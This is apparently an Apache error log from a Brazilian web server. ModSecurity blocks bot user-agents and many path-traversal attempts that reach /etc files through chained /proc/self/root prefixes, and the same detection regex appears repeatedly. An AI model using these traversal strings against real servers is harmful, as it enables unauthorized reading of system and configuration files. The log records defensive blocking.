[Tue Mar 17 22:43:51.292318 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.244.43:35910] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboDVuw_le52K8_3pV1-ZgAAAgE"]
[Tue Mar 17 22:44:09.125774 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58870] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:44:30.125293 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59126] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:44:32.663557 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.228.61:36580] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboDgNa6ubjKNq_cu4Y3oAAAA0U"]
[Tue Mar 17 22:44:37.371504 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:54200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboDhdY0UrI5A3LftIww2QAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:44:52.125842 2026] [proxy_fcgi:error] [pid 16560:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59388] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:45:14.133818 2026] [proxy_fcgi:error] [pid 16560:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59752] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:45:37.127161 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60020] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:45:46.401438 2026] [:error] [pid 17887:tid 140411540502272] [client 216.73.216.191:11086] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboDygkwaGbbGflqUZC1RgAAANg"]
[Tue Mar 17 22:45:59.085776 2026] [proxy_fcgi:error] [pid 16560:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60262] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:46:01.126537 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:53884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboD2QkwaGbbGflqUZC1TgAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:46:21.069619 2026] [proxy_fcgi:error] [pid 16560:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60494] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:46:43.125795 2026] [proxy_fcgi:error] [pid 2598:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60802] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:46:50.523013 2026] [:error] [pid 11816:tid 140411557287680] [client 216.73.216.191:31841] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboECuw_le52K8_3pV1-iwAAAhY"]
[Tue Mar 17 22:47:05.037861 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:32888] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:47:10.334144 2026] [mime_magic:error] [pid 2598:tid 140411624429312] (70014)End of file found: [client 74.7.241.31:57454] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/check_mk_agent
[Tue Mar 17 22:47:10.334230 2026] [access_compat:error] [pid 2598:tid 140411624429312] [client 74.7.241.31:57454] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/check_mk_agent
[Tue Mar 17 22:47:27.133767 2026] [proxy_fcgi:error] [pid 15051:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33166] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:47:49.137809 2026] [proxy_fcgi:error] [pid 16560:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33438] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:48:10.428469 2026] [:error] [pid 17887:tid 140411607643904] [client 216.73.216.191:3895] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboEWgkwaGbbGflqUZC1YQAAANA"]
[Tue Mar 17 22:48:11.133445 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33702] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:48:33.121803 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33954] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:48:34.181961 2026] [mime_magic:error] [pid 15826:tid 140411733534464] (70014)End of file found: [client 74.7.243.128:48212] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware
[Tue Mar 17 22:48:55.037834 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34266] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:49:17.149822 2026] [proxy_fcgi:error] [pid 15051:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34576] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:49:39.133808 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34874] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:50:03.728285 2026] [proxy_fcgi:error] [pid 2598:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35106] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:50:26.125828 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35440] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:50:49.557827 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35740] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:50:56.909245 2026] [access_compat:error] [pid 15826:tid 140411649607424] [client 216.73.216.191:35112] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Tue Mar 17 22:51:11.118617 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:51:33.137845 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36294] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:51:56.009770 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36638] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:52:18.137778 2026] [proxy_fcgi:error] [pid 11816:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36968] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:52:40.130049 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37258] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:53:02.153867 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37536] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:53:24.077884 2026] [proxy_fcgi:error] [pid 11816:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:37804] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:53:45.128472 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38148] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:53:54.363575 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.243.128:60400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboFsuw_le52K8_3pV1_gAAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:54:07.125891 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38426] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:54:29.112108 2026] [proxy_fcgi:error] [pid 15051:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38718] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:54:31.761262 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:48108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboF1wkwaGbbGflqUZC11wAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:54:51.052997 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39104] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:55:06.933452 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:56010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboF-sdf6f5d65gmYZRybwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:55:13.130863 2026] [proxy_fcgi:error] [pid 11816:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39358] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:55:35.129840 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39662] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:55:51.870803 2026] [:error] [pid 19507:tid 140411708356352] [client 216.73.216.191:48860] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboGJ9Y0UrI5A3LftIwxdwAAAYQ"]
[Tue Mar 17 22:55:58.121812 2026] [proxy_fcgi:error] [pid 2598:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39992] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:56:20.131495 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40232] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:56:44.121888 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40558] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:57:06.126938 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:57:09.411571 2026] [mime_magic:error] [pid 2598:tid 140411616036608] (70014)End of file found: [client 74.7.243.128:50282] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware
[Tue Mar 17 22:57:28.142752 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41232] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:57:50.137886 2026] [proxy_fcgi:error] [pid 2598:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41564] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:58:12.145877 2026] [proxy_fcgi:error] [pid 16560:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41868] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:58:34.022865 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.243.128:39698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboGyimAPhZkrhU8w4kUSgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:58:34.107872 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42166] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:58:41.911996 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:45380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboG0da6ubjKNq_cu4Y4UQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:58:55.130433 2026] [proxy_fcgi:error] [pid 11816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42446] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:59:04.230016 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.244.43:45704] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboG6Mdf6f5d65gmYZRyqQAAAtI"]
[Tue Mar 17 22:59:22.133791 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42750] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:59:43.476234 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.228.61:34436] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboHD-oXxyEfFpUF8f8QAwAAAUM"]
[Tue Mar 17 22:59:44.121826 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43080] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:00:07.126813 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43368] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:00:29.121811 2026] [proxy_fcgi:error] [pid 16560:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43732] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:00:36.926332 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:55018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboHROw_le52K8_3pV2AMAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 23:00:51.052566 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44102] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:01:13.125906 2026] [proxy_fcgi:error] [pid 15051:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44360] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 23:01:21.473074 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:35904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboHcew_le52K8_3pV2AbQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
